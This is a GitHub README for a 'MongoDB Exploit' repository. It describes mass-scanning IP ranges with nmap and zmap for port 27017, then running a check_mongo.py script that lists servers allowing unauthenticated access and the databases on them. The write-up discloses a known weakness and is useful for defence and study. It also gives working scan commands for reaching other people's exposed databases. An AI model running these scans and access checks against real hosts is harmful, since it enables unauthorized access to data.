mihneamanolache/MongoDB-Exploit

Some MongoDB clusters have no authentication and can therefor be accessed without credentials

MongoDB Exploit

• Exploit Title: MongoDB Unauthnticated Access
• Date:29.10.2022
• Exploit Authors: Mihnea Octavian Manolache & Sorin Marica
• Vendor Homepage:https://www.mongodb.com
• CVE: n/a
• Research Paper: https://mihnea.hashnode.dev/how-to-hack-mongo-databases

By default, Mongo servers can be accessed with no authentication required. Many unexperienced users never enable authentication, which leands to certain Mongo servers being exposed to bad actors. In the example below, we highlight how easy it is to discover and access Mongo databases using openly available software:

• nmap or zmap for open port discovery
• Python via pymongo for access

Open Ports Discovery

Consodering that:

1. The default MongoDB port is publicly available (27017) and can be used by anyone to attempt to identify servers running a Mongo instance.

2. Discovering open Mongo ports can be achieved by using at least three openly available software: shodan, nmap or zmap. Since shodan offers limited free access, we used nmap and zmap for the purpose of this report.

All an attacker needs to do in order to discover open MongoDB ports is to use one of the following options:

nmap

The nmap command used to discover open is:

nmap <IP_RANGE> -p 27017 -Pn > nmap.txt

This command probes open 27017 ports in the specified range (i.e. X.X.0.0/16) and outputs the result un the nmap.txt file. The output strcture is:

Nmap scan report for <IP_ADDRESS>
Host is up.

PORT      STATE  SERVICE
27017/tcp open mongod

To perform the attack, one has to manually add <IP_ADDRESS> to a new file (stripped from any other input).

zmap

The zmap command used to discover open is:

zmap -p 27017 <IP_RANGE>-o ips.txt   

The output for this command is a list of IP addresses and can be used without any modification in our check_mongo.py exploit.

Exploiting Open Mongo Server

Not all servers discovered with nmap or zmap are vulnerabl to this attack. Some do have authentication set up, hence cannot be accessed. However, our goal is to discover the servers which require not authentication. We can do so by:

1. Manually trying to access these servers via MongoDB Compass.
2. Using the check_mongo.py exploit

Checking access via exploit

Run the following command in your terminal:

python3 check_mongo.py 

The exploit starts probing for servers that allow unautheticateed acceess and outputs results in real time. It also generates a report.txt file when finished, which contains both the IP addresses of the vulnerable servers, and the available tables of databases it managed to access.

1. Exploit running:

2. Report file output:

[+] <IP_ADDRESS> - ['READ_ME_TO_RECOVER_YOUR_DATA', 'admin', 'config']